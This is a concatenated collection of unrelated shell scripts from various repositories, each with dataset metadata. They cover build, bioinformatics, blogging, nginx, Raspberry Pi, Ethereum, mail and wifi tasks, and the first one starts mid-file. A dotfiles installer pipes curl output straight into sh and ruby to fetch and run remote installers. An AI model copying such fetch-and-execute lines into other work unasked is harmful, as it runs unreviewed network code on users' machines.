# simple name for that branch (e.g., "main").
trackingBranch="${branchOverrides["${sm_path}"]}"
if [[ -z "${trackingBranch}" ]] ; then
trackingBranch="$(git symbolic-ref refs/remotes/origin/HEAD | sed s%^refs/remotes/%%)"
simpleBranchName="${trackingBranch:7}"
else
simpleBranchName="${trackingBranch}"
fi
# Check that the top of the branch being tracked is an ancestor of the
# current refpoint.
if ! git merge-base --is-ancestor "${sha1}" "${trackingBranch}" ; then
echo "Submodule ${sm_path} is not on ${simpleBranchName} because ${sha1} is not an ancestor of ${trackingBranch}."
# Remove the temporary file to signal an error. We don't use the exit
# status for this because it would cause `git submodule foreach` to stop
# looping, and we'd like to continue to check all remaining submodules.
rm -f "${tmpfile}"
fi
fi
| true
|
8a6b08081e8c9dd2413ad94ef7760f746cd62ae1
|
Shell
|
ComputationalBiomechanicsLab/opensim-creator
|
/scripts/build_mac-catalina.sh
|
UTF-8
| 4,602
| 3.546875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Mac Catalina: end-2-end build
#
# - this script should run to completion on a relatively clean
# Catalina (OSX 10.5) machine with xcode, CMake, etc. installed
#
# - run this from the repo root (opensim-creator) dir
# error out of this script if it fails for any reason
set -xeuo pipefail
# ----- handle external build parameters ----- #
# "base" build type to use when build types haven't been specified
OSC_BASE_BUILD_TYPE=${OSC_BASE_BUILD_TYPE:-Release}
# build type for all of OSC's dependencies
OSC_DEPS_BUILD_TYPE=${OSC_DEPS_BUILD_TYPE:-`echo ${OSC_BASE_BUILD_TYPE}`}
# build type for OSC
OSC_BUILD_TYPE=${OSC_BUILD_TYPE-`echo ${OSC_BASE_BUILD_TYPE}`}
# extra compiler flags for the C++ compiler
OSC_CXX_FLAGS=${OSC_CXX_FLAGS:-`echo -fno-omit-frame-pointer`}
# maximum number of build jobs to run concurrently
#
# defaulted to 1, rather than `sysctl -n hw.physicalcpu`, because OpenSim
# requires a large amount of RAM--more than most machines have--to build
# concurrently, #659
OSC_BUILD_CONCURRENCY=${OSC_BUILD_CONCURRENCY:-1}
# which build system to use (e.g. Ninja, Makefile: see https://cmake.org/cmake/help/latest/manual/cmake-generators.7.html)
OSC_GENERATOR=${OSC_GENERATOR:-`echo Unix Makefiles`}
# which OSC build target to build
#
# osc just build the osc binary
# package package everything into a .dmg installer
OSC_BUILD_TARGET=${OSC_BUILD_TARGET:-package}
# set this if you want to skip installing system-level deps
#
# OSC_SKIP_BREW
# set this if you want to build the documentation
#
# OSC_BUILD_DOCS
set +x
echo "----- starting build -----"
echo ""
echo "----- printing build parameters -----"
echo ""
echo " OSC_BASE_BUILD_TYPE = ${OSC_BASE_BUILD_TYPE}"
echo " OSC_DEPS_BUILD_TYPE = ${OSC_DEPS_BUILD_TYPE}"
echo " OSC_BUILD_TYPE = ${OSC_BUILD_TYPE}"
echo " OSC_CXX_FLAGS = ${OSC_CXX_FLAGS}"
echo " OSC_BUILD_CONCURRENCY = ${OSC_BUILD_CONCURRENCY}"
echo " OSC_GENERATOR = ${OSC_GENERATOR}"
echo " OSC_BUILD_TARGET = ${OSC_BUILD_TARGET}"
echo " OSC_SKIP_BREW = ${OSC_SKIP_BREW:-OFF}"
echo " OSC_BUILD_DOCS = ${OSC_BUILD_DOCS:-OFF}"
echo ""
set -x
echo "----- ensuring all submodules are up-to-date -----"
git submodule update --init --recursive
if [[ -z ${OSC_SKIP_BREW:+x} ]]; then
echo "----- getting system-level dependencies -----"
# reinstall gcc
#
# this is necessary because OpenSim depends on gfortran for
# libBLAS. This is probably a misconfigured dependency in OpenSim,
# because Mac already contains an Apple-provided libBLAS
brew reinstall gcc
# `wget`
#
# seems to be a transitive dependency of OpenSim (Metis),
# which uses wget to get other deps
# `automake`
#
# seems to be a transitive dependency of OpenSim (adolc)
# uses `aclocal` for configuration
brew install wget
# osc: docs dependencies
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && brew install python3
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && pip3 install --user wheel
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && pip3 install --user -r docs/requirements.txt
# ensure sphinx-build is available on this terminal's PATH
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && ls "$(python3 -m site --user-base)/bin"
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && export PATH=${PATH}:"$(python3 -m site --user-base)/bin"
echo "----- finished getting system-level dependencies -----"
else
echo "----- skipping getting system-level dependencies (OSC_SKIP_BREW) is
set -----"
fi
echo "----- PATH -----"
echo "${PATH}"
echo "----- /PATH -----"
echo "----- printing system (post-dependency install) info -----"
cc --version
c++ --version
cmake --version
make --version
[[ ! -z ${OSC_BUILD_DOCS:+z} ]] && sphinx-build --version # required when building docs
echo "----- building OSC's dependencies -----"
cmake \
-S third_party \
-B "osc-deps-build" \
-DCMAKE_BUILD_TYPE=${OSC_DEPS_BUILD_TYPE} \
-DCMAKE_INSTALL_PREFIX="osc-deps-install"
cmake \
--build "osc-deps-build" \
-j${OSC_BUILD_CONCURRENCY}
echo "----- building OSC -----"
cmake \
-S . \
-B "osc-build" \
-DCMAKE_BUILD_TYPE=${OSC_BUILD_TYPE} \
-DCMAKE_PREFIX_PATH="${PWD}/osc-deps-install" \
${OSC_BUILD_DOCS:+-DOSC_BUILD_DOCS=ON}
# build tests and the final package
cmake \
--build "osc-build" \
--target testopensimcreator testoscar ${OSC_BUILD_TARGET} \
-j${OSC_BUILD_CONCURRENCY}
# ensure tests pass
osc-build/tests/OpenSimCreator/testopensimcreator
osc-build/tests/oscar/testoscar
| true
|
c156542ffc5c93d19aa73a7ee2247d514634f1f4
|
Shell
|
lzlgboy/scRNASeqPipeline
|
/0_CRAM2BAM.sh
|
UTF-8
| 1,021
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
CRAM_file=$1
BAM_dir=$2
WORK_dir=$3 # fast I/O location with space to store genome & temporary files
export REF_CACHE=$WORK_dir
SAMTOOLS=/nfs/users/nfs_t/ta6/RNASeqPipeline/software/CRAM/samtools-1.3.1/samtools
# Checks
USAGE="Usage: 0_CRAM2BAM.sh cram_file bam_dir work_dir\n
\tArguments:\n
\tcram_file = CRAM file or directory of CRAM files if running in job array\n
\tbam_dir = directory to be filled with BAM files\n
\twork_dir = fast I/O location with space to store genome\n"
if [ -z $CRAM_file ] || [ -z $BAM_dir ] || [ -z $WORK_dir ] ; then
echo -e $USAGE
exit 1
fi
if [ ! -f $SAMTOOLS ] ; then
echo "$SAMTOOLS not available"
exit 1
fi
# Get all CRAM files
if [ ! -z $LSB_JOBINDEX ]; then
CRAMS=($CRAM_file/*.cram)
INDEX=$(($LSB_JOBINDEX-1))
FILE=${CRAMS[$INDEX]}
else
FILE=$CRAM_file
fi
NAME=`basename ${FILE%.cram}` #remove path and .cram suffix
cp $FILE $WORK_dir/$NAME.cram
$SAMTOOLS view -b -h $WORK_dir/$NAME.cram -o $BAM_dir/$NAME.bam
rm $WORK_dir/$NAME.cram
| true
|
8a40a100dfb21645c1d1c38f8e036cf248beadb9
|
Shell
|
oxinabox/oxinabox.github.io
|
/scripts/jupyter/run_nbconvert.sh
|
UTF-8
| 348
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash -x
jupyter nbconvert --to markdown "$1" --config jekyll_config.py --template=jekyll.tpl --Application.log_level='DEBUG'
outputname=$(basename "$1" .ipynb)
outputpath=${1%.ipynb}
postname=$(date +"%Y-%m-%d-")$(echo $outputname | tr " " -)
mv "$outputpath.md" "../../_posts/$postname.md"
mv "$outputname"_files ../../posts_assets/
| true
|
ccf1c236913d88f8873fd3abc8db2e2cb86cf6e1
|
Shell
|
seanjones2848/hercules
|
/mares_of_diomedes/catcher.sh
|
UTF-8
| 315
| 2.953125
| 3
|
[] |
no_license
|
./mangercentos & PID=$!
kill -14 $PID
echo "Dearest King, The horses have been coralled, would you like them tamedor to remain wild? (t/w)"
read ans
case $ans in
't') ./wild 0 & echo "Here are your tamed horses." ;;
'w') ./wild 1 & echo "You asked for it..." ;;
'*') echo "You failed to pick an option" ;;
esac
| true
|
69216bb6da38371e88e68cd0c088c89a543a3775
|
Shell
|
lop-old/xLemp
|
/src/compile_nginx.sh
|
UTF-8
| 2,103
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/sh
clear
source /usr/bin/shellscripts/common.sh
title 'Compiling Nginx..'
if [ "$(id -u)" != "0" ]; then
errcho 'This script must be run as root'
fi
# install mercurial if needed
if [ ! -f /usr/bin/hg ]; then
yum install -y mercurial
fi
# clone repo
if [ -d /usr/local/src/nginx/ ]; then
pushd /usr/local/src/nginx/
hg update --clean \
|| exit 1
popd
else
pushd /usr/local/src/
hg clone http://hg.nginx.org/nginx/ \
|| exit 1
popd
fi
# find nginx version
pushd /usr/local/src/nginx/
RELEASE=`hg tags | grep release-1.8. | head -n1 | awk -F' ' '{print $1}' | awk -F'-' '{print $2}'`
if [ -z $RELEASE ]; then
errcho 'Failed to find latest version!'
exit 1
fi
title "Nginx Version ${RELEASE}"
hg update "release-${RELEASE}" \
|| exit 1
popd
### prerequisites
# pcre
if [ ! -f /usr/include/pcre.h ]; then
yum install -y pcre pcre-devel || exit 1
fi
# zlib
if [ ! -f /usr/include/zlib.h ]; then
yum install -y zlib zlib-devel || exit 1
fi
# ssl
if [ ! -f /usr/include/openssl/ssl3.h ]; then
yum install -y openssl openssl-devel || exit 1
fi
# gcc/make
if [ ! -f /usr/bin/gcc ]; then
yum groupinstall -y 'Development Tools' || exit 1
fi
# compile
pushd /usr/local/src/nginx/
./auto/configure \
--prefix=/usr/local/nginx-${RELEASE} \
--conf-path=/etc/nginx/nginx.conf \
--error-log-path=/var/log/nginx/error.log \
--pid-path=/run/nginx.pid \
--lock-path=/var/lock/nginx.lock \
--http-log-path=/var/log/access.log \
--http-client-body-temp-path=/var/lib/nginx/tmp/client_body/ \
--http-proxy-temp-path=/var/lib/nginx/tmp/proxy/ \
--http-fastcgi-temp-path=/var/lib/nginx/tmp/fastcgi/ \
--http-uwsgi-temp-path=/var/lib/nginx/tmp/uwsgi/ \
--http-scgi-temp-path=/var/lib/nginx/tmp/scgi/ \
--user=nginx \
--group=nginx \
--without-http_ssi_module \
--with-http_ssl_module \
--with-http_stub_status_module \
|| exit 1
make || exit 1
make install || exit 1
popd
ln -sf "/usr/local/nginx-${RELEASE}/sbin/nginx" /usr/local/sbin/nginx \
|| exit 1
ls -l /usr/local/sbin/nginx
title "Nginx ${RELEASE} Successfully Installed!"
| true
|
bd88772d12adfc37858857696f634bea55606ede
|
Shell
|
rdkcmf/rdkb-raspberrypi-sysint
|
/lib/rdk/bank_image_switch.sh
|
UTF-8
| 2,406
| 3.28125
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-unknown"
] |
permissive
|
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2019 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
#--------------------------------------------------------------------------------------------------
# Identify active bank ( either bank 0 or bank 1 ) or ( mmcblk0p2 or mmcblk0p3 )
#--------------------------------------------------------------------------------------------------
activeBank=`sed -e "s/.*root=//g" /proc/cmdline | cut -d ' ' -f1`
echo "Active bank partition is $activeBank"
bank1_partition_name=`fdisk /dev/mmcblk0 -l | tail -2 | cut -d' ' -f1 | head -n1`
storage_block_name=`fdisk /dev/mmcblk0 -l | tail -2 | cut -d' ' -f1 | tail -1`
mkdir -p /extblock
mount $storage_block_name /extblock
mkdir -p /extblock/bank0_linux
mount /dev/mmcblk0p1 /extblock/bank0_linux
if [ "$activeBank" = "$bank1_partition_name" ];
then
passiveBank=/dev/mmcblk0p2;
rm -rf /extblock/bank0_linux/*
cp -R /extblock/data_bkup_linux_bank0/* /extblock/bank0_linux/
# change cmdline.txt for bank0 linux to partition p2 or mmcblk0p2 which has to be active bank after reboot
sed -i -e "s|${activeBank}|${passiveBank}|g" /extblock/bank0_linux/cmdline.txt
else
passiveBank=$bank1_partition_name;
rm -rf /extblock/bank0_linux/*
cp -R /extblock/data_bkup_linux_bank1/* /extblock/bank0_linux/
# change cmdline.txt for bank0 linux to partition p2 or mmcblk0p2 which has to be active bank after reboot
sed -i -e "s|${activeBank}|${passiveBank}|g" /extblock/bank0_linux/cmdline.txt
fi
umount /extblock/bank0_linux
rm -rf /extblock/bank0_linux
umount /extblock
echo "Rebooting with bank switch ...."
reboot -f
| true
|
19bcbf3b1d7df92909ed1e3196734a63c84e1bd5
|
Shell
|
davegreig/dotfiles
|
/install.sh
|
UTF-8
| 940
| 3.203125
| 3
|
[] |
no_license
|
#! /bin/bash
# 0. Install oh-my-zsh
sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)"
# 1. Install Homebrew
if ! [ -x "$(command -v brew)" ]; then
echo -e "Downloading and installing Homebrew 🍺"
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
fi
# 2. Install all the brews
echo -e "\n🍻 Update Homebrew settings...\n"
brew analytics off
brew install $(<brew-list)
brew install --cash $(<brew-cask-list)
# 3. Install Powerlevel10k
git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k
## Manual step - set the theme
```Set ZSH_THEME="powerlevel10k/powerlevel10k" in ~/.zshrc.```
# 4. Setup MacOS preferences
./macos.sh
#5. Set up iTerm2
echo -e "\nCopying across iTerm2 Preferences...\n"
cp iTerm/itermProfile.json ~/Library/Application\ Support/iTerm2/DynamicProfiles
| true
|
316ac05cb358ed52fb2033b6c47a2a1c2f3ba19a
|
Shell
|
rsefer/dotfiles
|
/setup/functions.sh
|
UTF-8
| 1,991
| 4.125
| 4
|
[] |
no_license
|
BRACKETSTART="\r\n[ "
BRACKETEND=" ] "
LINEEND="\n"
COLOREND=$'\e[0m'
COLORRED=$'\e[31m'
COLORGREEN=$'\e[32m'
COLORYELLOW=$'\e[33m'
COLORBLUE=$'\e[34m'
message () {
printf "${BRACKETSTART}$3$2${COLOREND}${BRACKETEND}$1${LINEEND}"
}
plus () {
message "$1" "++" $COLORGREEN
}
success () {
message "$1" "OK" $COLORGREEN
}
minus () {
message "$1" "--" $COLORRED
}
fail () {
message "$1" "XX" $COLORRED
}
info () {
message "$1" ".." $COLORBLUE
}
user () {
message "$1" "??" $COLORYELLOW
}
readyn () {
user "$1"
read -n 1 -r
echo "\n"
}
link_file () {
local src=$1 dst=$2
local overwrite= backup= skip=
local action=
if [ -f "$dst" -o -d "$dst" -o -L "$dst" ]
then
if [ "$overwrite_all" == "false" ] && [ "$backup_all" == "false" ] && [ "$skip_all" == "false" ]
then
local currentSrc="$(readlink $dst)"
if [ "$currentSrc" == "$src" ]
then
skip=true;
else
user "File already exists: $dst ($(basename "$src")), what do you want to do?\n\
[s]kip, [S]kip all, [o]verwrite, [O]verwrite all, [b]ackup, [B]ackup all?"
read -n 1 action
case "$action" in
o )
overwrite=true;;
O )
overwrite_all=true;;
b )
backup=true;;
B )
backup_all=true;;
s )
skip=true;;
S )
skip_all=true;;
* )
;;
esac
fi
fi
overwrite=${overwrite:-$overwrite_all}
backup=${backup:-$backup_all}
skip=${skip:-$skip_all}
if [ "$overwrite" == "true" ]
then
rm -rf "$dst"
success "removed $dst"
fi
if [ "$backup" == "true" ]
then
mv "$dst" "${dst}.backup"
success "moved $dst to ${dst}.backup"
fi
if [ "$skip" == "true" ]
then
success "skipped $src"
fi
fi
if [ "$skip" != "true" ] # "false" or empty
then
ln -s "$1" "$2"
success "linked $1 to $2"
fi
}
| true
|
bfaa7903ad6f79bbe23b11936483a8746ab660d3
|
Shell
|
FutureTrust/gtsl
|
/docker/ethereum/src/start_geth.sh
|
UTF-8
| 2,359
| 3.890625
| 4
|
[] |
no_license
|
#!/bin/sh
GEN_ARGS=
echo "Running ethereum node with CHAIN_TYPE=$CHAIN_TYPE"
if [[ "$CHAIN_TYPE" == "private" ]]; then
# empty datadir -> geth init
DATA_DIR=${DATA_DIR:-"/root/.ethereum"}
echo "DATA_DIR '$DATA_DIR' non existant or empty. Initializing DATA_DIR..."
# check if keystore is empty
KEYSTORE="$(ls -A ${DATA_DIR}/keystore)"
COUNT_KEYSTORE="$(ls -A ${DATA_DIR}/keystore | wc -l )"
echo "You have ${COUNT_KEYSTORE} account(s)"
if [[ "$COUNT_KEYSTORE" -ge 2 ]]; then
echo "Keystore: "
echo "${KEYSTORE}"
else
if [[ "$ACCOUNT_NEW" == "true" ]]; then
echo "Generating new account(s)..."
PASSWORD="/opt/password"
if [[ -s ${PASSWORD} ]]; then
geth --datadir "$DATA_DIR" --password "$PASSWORD" account new
if [[ "$COUNT_KEYSTORE" -eq 0 ]]; then
geth --datadir "$DATA_DIR" --password "$PASSWORD" account new
fi
else
echo "Unable to create a new account: $PASSWORD file is missing or is empty."
exit
fi
else
echo "Unable to find an account, please add two existing account in data/keystore or enable to generate new account with ACCOUNT_NEW=true"
exit
fi
fi
# replace vars in genesis.json
if [[ ! -z ${GEN_NONCE} ]]; then
echo "Generating genesis.nonce from arguments..."
sed "s/\${GEN_NONCE}/$GEN_NONCE/g" -i /opt/genesis.json
fi
if [[ ! -z ${NET_ID} ]]; then
echo "Generating genesis.net_id from arguments..."
sed "s/\${NET_ID}/$NET_ID/g" -i /opt/genesis.json
fi
echo "Accounts:"
for f in "${DATA_DIR}"/keystore/* ; do
ACCOUNT=$(echo ${f} | awk -F'--' 'NR==1{print $3}')
echo "account: $ACCOUNT"
GEN_ALLOC=${GEN_ALLOC}'"'${ACCOUNT}'": { "balance": "0x2000000000000000000000000000000000000000000000000000000000000000" }, '
done
GEN_ALLOC=$(echo ${GEN_ALLOC} | sed 's/.$//')
echo "Generating genesis.alloc from accounts..."
sed "s/\${GEN_ALLOC}/$GEN_ALLOC/g" -i /opt/genesis.json
cat /opt/genesis.json
geth --datadir "$DATA_DIR" init /opt/genesis.json
GEN_ARGS="--datadir $DATA_DIR --nodiscover --identity miner --fast --cache=1024 --verbosity=3 --maxpeers=$MAX_PEERS --mine --minerthreads=4"
[[ ! -z ${NET_ID} ]] && GEN_ARGS="$GEN_ARGS --networkid=$NET_ID"
fi
echo "Running geth with arguments $GEN_ARGS $@"
exec geth ${GEN_ARGS} "$@"
| true
|
6ca04dafa2247c10a1e4a2ee103425b8e8f09f2f
|
Shell
|
dbalseiro/bin
|
/databases
|
UTF-8
| 807
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Interactive helper: pick a PostgreSQL server and database via the menu
# helpers from selector.bash, then open a pre-seeded SQL buffer in vim
# inside the update-scripts directory.
# Depends on ~/bin/selector.bash providing: mostrarlistado, elegir, main.
set -e
servers=~/bin/pgservers
source ~/bin/selector.bash
# pedirdb: list databases on the currently selected server and let the user
# pick one. Relies on $connstr having been set by ejecutar() beforehand;
# the unquoted expansion is intentional so "-h host -U user" word-splits.
function pedirdb() {
listabases=/tmp/listabases.$$.tmp
psql $connstr --list --tuples-only |
awk '$3 == "inscripcion_user" || $3 == "postgres" { print $1 }' > $listabases
mostrarlistado $listabases
while elegir $listabases abrirdb; do
echo "error"
done
}
# abrirdb: selection callback -- resolve menu index $1 to a database name.
function abrirdb() {
database=`cat $listabases | head -$1 | tail -1`
}
# ejecutar: server-selection callback. Builds a psql connection string from
# line $1 of the servers file (format: label#user@host), asks for a database,
# then opens vim on a temp SQL buffer seeded with the connection comment.
function ejecutar() {
local buffer="/tmp/$(basename $0).$$.sql"
database=
connstr=`cat $servers | cut -f2 -d"#" | head -$1 | tail -1 |
awk -F"@" '{ printf("-h %s -U %s", $2, $1) }'`
pedirdb
echo "-- $connstr -d $database" > $buffer
echo >> $buffer
(cd ~/git/gcaba-io/database/update-scripts/01.08.00 ; vim $buffer +)
}
# main is provided by selector.bash and drives the selection loop.
main
| true
|
19160968317aca10b3fddf5d2893123d1f59564b
|
Shell
|
9001/copyparty
|
/scripts/rls.sh
|
UTF-8
| 1,338
| 3.5
| 4
|
[
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
#!/bin/bash
# Release helper for copyparty: tags and pushes a version, builds the
# pypi/tgz artifacts, then (re)builds the self-extracting sfx bundle.
# Usage: rls.sh <version>|sfx [make-sfx args...]
set -e
# Number of parallel sfx size-bruteforce workers; 1 disables that mode.
parallel=1
# Allow running either from the repo root or from scripts/.
[ -e make-sfx.sh ] || cd scripts
[ -e make-sfx.sh ] && [ -e deps-docker ] || {
echo cd into the scripts folder first
exit 1
}
v=$1
# "sfx" skips tagging/packaging and only rebuilds the bundle.
[ "$v" = sfx ] || {
# Version must be numeric and must already appear in __version__.py.
printf '%s\n' "$v" | grep -qE '^[0-9\.]+$' || exit 1
grep -E "(${v//./, })" ../copyparty/__version__.py || exit 1
git push all
git tag v$v
git push all --tags
rm -rf ../dist
./make-pypi-release.sh u
(cd .. && python3 ./setup.py clean2)
./make-tgz-release.sh $v
}
rm -f ../dist/copyparty-sfx*
shift
./make-sfx.sh "$@"
f=../dist/copyparty-sfx
# Some builds emit a gzipped variant; detect which suffix exists.
[ -e $f.py ] && s= || s=-gz
# Smoke-test the produced bundle.
$f$s.py --version >/dev/null
# Parallel size-bruteforce mode (inactive while parallel=1): workers keep
# rebuilding and keep only the smallest bundle seen so far.
[ $parallel -gt 1 ] && {
printf '\033[%s' s 2r H "0;1;37;44mbruteforcing sfx size -- press enter to terminate" K u "7m $* " K $'27m\n'
trap "rm -f .sfx-run; printf '\033[%s' s r u" INT TERM EXIT
touch .sfx-run
min=99999999
for ((a=0; a<$parallel; a++)); do
while [ -e .sfx-run ]; do
CSN=sfx$a ./make-sfx.sh re "$@"
sz=$(wc -c <$f$a$s.py | awk '{print$1}')
[ $sz -ge $min ] && continue
mv $f$a$s.py $f$s.py.$sz
min=$sz
done &
done
read
exit
}
# Sequential mode: keep rebuilding, archiving each result by its byte size.
while true; do
mv $f$s.py $f$s.$(wc -c <$f$s.py | awk '{print$1}').py
./make-sfx.sh re "$@"
done
# git tag -d v$v; git push --delete origin v$v
| true
|
f37be049546ca7c9b173b85038e90394331f8024
|
Shell
|
sroettger/35c3ctf_chals
|
/logrotate/skel/usr/sbin/update-exim4.conf.template
|
UTF-8
| 3,409
| 4.125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Generate ${CONFDIR}/exim4.conf.template by concatenating the configuration
# fragments under ${CONFDIR}/conf.d. Refuses to act unless -r/--run is given.
set -e
CONFDIR="${CONFDIR:-/etc/exim4}"
# Safety latch: flipped to 'false' only by the -r/--run option.
DONOTRUN='true'
UPEX4CT_outputfile="${CONFDIR}/exim4.conf.template"
# Print a short help text describing the supported options to stdout.
usage() {
  printf '%s\n' \
    "$0 - Generate exim4 configuration file template" \
    "Options:" \
    "-n|--nobackup - Overwrite old template, do not take backup." \
    "-o|--output file - write output to file instead of ${UPEX4CT_outputfile}" \
    "-h|--help - This message." \
    "-r|--run - Actually do something"
}
## Parse commandline
# getopt(1) normalises both short and long options into a canonical list.
TEMP=$(getopt -n update-exim4.conf.template \
-l nobackup,output:,help,run -- \
+no:hr "$@")
if test "$?" != 0; then
echo "Terminating..." >&2
exit 1
fi
# Re-install the normalised options as positional parameters.
eval set -- ${TEMP}
# Consume options until the "--" separator emitted by getopt.
while test "$1" != "--"; do
case $1 in
-h|--help)
usage
exit 0
;;
-o|--output)
shift
UPEX4CT_outputfile="$1"
;;
-n|--nobackup)
NOBACKUP=1
;;
-r|--run)
DONOTRUN='false'
;;
esac
shift
done
shift
# No non-option arguments allowed.
if [ "$#" -ne 0 ]; then
echo "No non option arguments ($@) allowed" >&2
usage >&2
exit 1
fi
# run-parts emulation, stolen from Branden's /etc/X11/Xsession
# Addition: Use file.rul instead if file if it exists.
# Emits (to stdout) the path of every run-parts-style fragment in directory
# $1, preferring "<name>.rul" over "<name>" when both exist. Only names
# consisting of alphanumerics, '_' and '-' are accepted.
run_parts () {
# reset LC_COLLATE
# Clearing locale vars keeps the ls ordering stable across environments.
unset LANG LC_COLLATE LC_ALL
if [ -z "$1" ]; then
errormessage "$0: internal run_parts called without an argument"
fi
if [ ! -d "$1" ]; then
errormessage "$0: internal run_parts called, but $1 does not exist or is not a directory."
fi
# NOTE(review): 'grep -v /.svn' filters ls output, which contains bare
# file names without slashes -- this pattern likely never matches; the
# expr filter below already rejects dotted names. Confirm intent.
for F in $(ls $1 | grep -v /.svn); do
if expr "$F" : '[[:alnum:]_-]\+$' > /dev/null 2>&1; then
if [ -f "$1/$F" ] ; then
if [ -f "$1/${F}.rul" ] ; then
echo "$1/${F}.rul"
else
echo "$1/$F"
fi
fi
fi
done;
}
# also from Branden
# Fold a diagnostic message of arbitrary length to the terminal width
# (COLUMNS, default 80) and emit it on stderr.
errormessage () {
  local width=${COLUMNS:-80}
  printf '%s\n' "$*" | fold -s -w "$width" >&2
}
# Concatenate every fragment reported by run_parts for directory $1 to
# stdout, wrapping each file in begin/end banner comments.
cat_parts() {
  local banner="#####################################################"
  local part
  if [ -z "$1" ]; then
    errormessage "$0: internal cat_parts called without an argument"
  fi
  if [ ! -d "$1" ]; then
    errormessage "$0: internal cat_parts called, but $1 does not exist or is not a directory."
  fi
  for part in $(run_parts $1); do
    printf '%s\n' "$banner" "### $part" "$banner"
    cat $part
    printf '%s\n' "$banner" "### end $part" "$banner"
  done
}
# Refuse to run without explicit -r/--run confirmation.
if [ "$DONOTRUN" = "true" ]; then
errormessage "This program overwrites conffiles. Do not run unless you have consulted the manpage." >&2
echo "Terminating..." >&2
exit 1
fi
# Abort early if a backup using this PID's suffix already exists.
if [ -e "${UPEX4CT_outputfile}" ] && [ -z "$NOBACKUP" ]; then
if [ -e "${UPEX4CT_outputfile}.bak.$$" ]; then
echo >&2 "ERR: ${UPEX4CT_outputfile}.bak.$$ already exists, aborting"
exit 1
fi
fi
# Build the new template into a temp file, copying the old file's mode.
NEWTEMPLATE=$(tempfile -m644 -p ex4)
if [ -f "${UPEX4CT_outputfile}" ] ; then
chmod --reference="${UPEX4CT_outputfile}" "$NEWTEMPLATE"
fi
# generate .template. Ugly - better alternative?
SAVEWD="$(pwd)"
cd ${CONFDIR}/conf.d
# Section order matters: exim expects main/acl/router/... in this sequence.
for i in main acl router transport retry rewrite auth ; do
cat_parts $i
done > "$NEWTEMPLATE"
cd "$SAVEWD"
# Rotate the previous template aside unless -n/--nobackup was given.
if [ -e "${UPEX4CT_outputfile}" ] && [ -z "$NOBACKUP" ] ; then
mv "${UPEX4CT_outputfile}" \
"${UPEX4CT_outputfile}.bak.$$"
fi
mv "$NEWTEMPLATE" "${UPEX4CT_outputfile}"
| true
|
180de15a03a21fdc7879487c8a11b9b1f9531524
|
Shell
|
aganzai/xmwifi_sta
|
/run/wifi_run.sh
|
UTF-8
| 537
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/sh
# Restart the MT7601U USB wifi driver, relaunch wpa_supplicant on ra0 and,
# when credentials are provided, associate and request a DHCP lease.
# Environment: NAME (DHCP hostname, default centos_XM), SSID, PSK.

# Default the hostname only when the caller did not provide one.
# Fixed: the original tested `[ -n $NAME ]`, which is always true when NAME
# is empty (the unquoted expansion collapses to a one-argument test), so any
# caller-supplied value was clobbered.
if [ -z "$NAME" ]; then
NAME=centos_XM
fi
ifconfig ra0 down
sleep 1
modprobe -r mt7601Usta
sleep 1
killall wpa_supplicant
killall dhclient
sleep 1
modprobe mt7601Usta
# Stale control socket prevents wpa_supplicant from starting.
rm -rf /var/run/wpa_supplicant/ra0
sleep 1
wpa_supplicant -c ./wpa_supplicant.conf -i ra0 -B
# Configure and select the network only when both credentials were supplied.
# Fixed: `[ ! -n $SSID ] || [ ! -n $PSK ]` evaluated to false for every
# input, so this block was unreachable.
if [ -n "$SSID" ] && [ -n "$PSK" ]; then
wpa_cli remove_network 0
wpa_cli ap_scan 1
wpa_cli add_network
wpa_cli set_network 0 ssid "$SSID"
wpa_cli set_network 0 psk "$PSK"
wpa_cli select_network 0
wpa_cli list_networks
dhclient ra0 -H "$NAME"
fi
| true
|
7edf09930390d9d8588200ae743cd0fd700f6dc5
|
Shell
|
singhsaysdotcom/dotfiles
|
/scripts/bootstrap.sh
|
UTF-8
| 255
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
# Bootstrap dotfiles: run macOS-specific setup when on Darwin, then symlink
# the tracked config files into $HOME (-f overwrites any existing links).
if [[ $('uname') == 'Darwin' ]]; then
~/dotfiles/scripts/osx.sh
fi
echo "Creating symlinks ..."
ln -sf ~/dotfiles/vim ~/.vim
ln -sf ~/dotfiles/vim/vimrc ~/.vimrc
ln -sf ~/dotfiles/zshrc ~/.zshrc
ln -sf ~/dotfiles/tmux.conf ~/.tmux.conf
| true
|
8c5f3ace531741d2da9e03b33e7d9b080406139f
|
Shell
|
ryanwoodsmall/oldsysv
|
/sysvr4/svr4/cmd/portmgmt/port_quick/q-rm.sh
|
UTF-8
| 2,907
| 3.421875
| 3
|
[] |
no_license
|
# Copyright (c) 1990 UNIX System Laboratories, Inc.
# Copyright (c) 1984, 1986, 1987, 1988, 1989, 1990 AT&T
# All Rights Reserved
# THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF
# UNIX System Laboratories, Inc.
# The copyright notice above does not evidence any
# actual or intended publication of such source code.
